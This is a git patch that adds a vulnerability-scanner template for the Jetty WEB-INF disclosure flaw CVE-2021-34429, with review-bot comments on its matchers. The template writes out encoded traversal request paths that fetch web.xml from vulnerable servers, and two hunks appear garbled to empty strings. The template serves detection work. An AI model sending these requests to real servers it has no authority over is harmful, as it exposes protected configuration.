From 938fdeec8f8512fb9894ecedec54ffcd02d1bb70 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 22 Jul 2021 15:23:19 +0530
Subject: [PATCH] Added CVE-2021-34429 and fixed related templates

---
 cves/2021/CVE-2021-28164.yaml |  2 +-
 cves/2021/CVE-2021-28169.yaml |  2 +-
 cves/2021/CVE-2021-34429.yaml | 35 +++++++++++++++++++++++++++++++++++
 3 files changed, 37 insertions(+), 2 deletions(-)
 create mode 100644 cves/2021/CVE-2021-34429.yaml

diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml
index a62da7df33..859333bacb 100644
--- a/cves/2021/CVE-2021-28164.yaml
+++ b/cves/2021/CVE-2021-28164.yaml
@@ -24,7 +24,7 @@ requests:
       - type: word
         words:
-          - ""
+          - ""
           - "java.sun.com"
         part: body
         condition: and
diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml
index 09ad71064e..00d2820a84 100644
--- a/cves/2021/CVE-2021-28169.yaml
+++ b/cves/2021/CVE-2021-28169.yaml
@@ -27,7 +27,7 @@ requests:
       - type: word
         words:
-          - ""
+          - ""
           - "java.sun.com"
         part: body
         condition: and
diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml
new file mode 100644
index 0000000000..034033aa80
--- /dev/null
+++ b/cves/2021/CVE-2021-34429.yaml
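Review bot: On the new side of both hunks the replaced `words` entry reads as an empty string `""`, identical to the line it replaces, so as rendered the change is a no-op and, because the matcher uses `condition: and`, the check degenerates to `java.sun.com` alone since every response body contains the empty string. Most likely the real token (an XML marker such as `<?xml`) was stripped when this patch was rendered; if the files genuinely contain `- ""`, the line should carry a non-empty token, e.g. `- "<?xml"`. The enclosing `requests` block begins before the hunk in both files.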
@@ -0,0 +1,35 @@
+id: CVE-2021-34429
+
+info:
+  name: Jetty Authorization Before Parsing and Canonicalization Variation
+  author: Bernardo Rodrigues @bernardofsr | André Monteiro @am0nt31r0
+  severity: medium
+  description: |
+    For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.
+  reference: |
+    - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
+  tags: cve,cve2021,jetty
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/%u002e/WEB-INF/web.xml'
+      - '{{BaseURL}}/.%00/WEB-INF/web.xml'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - ""
+          - "java.sun.com"
+        part: body
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"
\ No newline at end of file
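Review bot: The body matcher only accepts a web.xml whose schema namespace contains `java.sun.com`, yet the description scopes this template to the Jetty 10 and 11 lines as well, where a web.xml commonly declares the `xmlns.jcp.org` (Servlet 3.1+) or `jakarta.ee` (Jakarta EE 9) namespace instead, so such a host can answer 200 with an `application/xml` body and still be reported clean. Because the `words` list is joined with `condition: and`, the extra namespaces cannot simply be appended; I would keep the XML-declaration token in its own matcher and put the namespace alternatives in a second word matcher with `condition: or`, which `matchers-condition: and` then combines with the existing status and header checks without loosening them. As rendered, the first entry of the `words` list is an empty string `""`, which matches every body — presumably `<?xml` lost in rendering, so the fence below assumes that token; if the file literally contains `""`, it needs a non-empty value regardless.
```yaml
    matchers:
      # … unchanged: status 200 matcher …

      - type: word
        words:
          - "<?xml"
        part: body

      # web.xml schema namespace varies between Servlet (J2EE / JCP) and Jakarta EE generations
      - type: word
        part: body
        condition: or
        words:
          - "java.sun.com"
          - "xmlns.jcp.org"
          - "jakarta.ee"

      # … unchanged: application/xml header matcher …
```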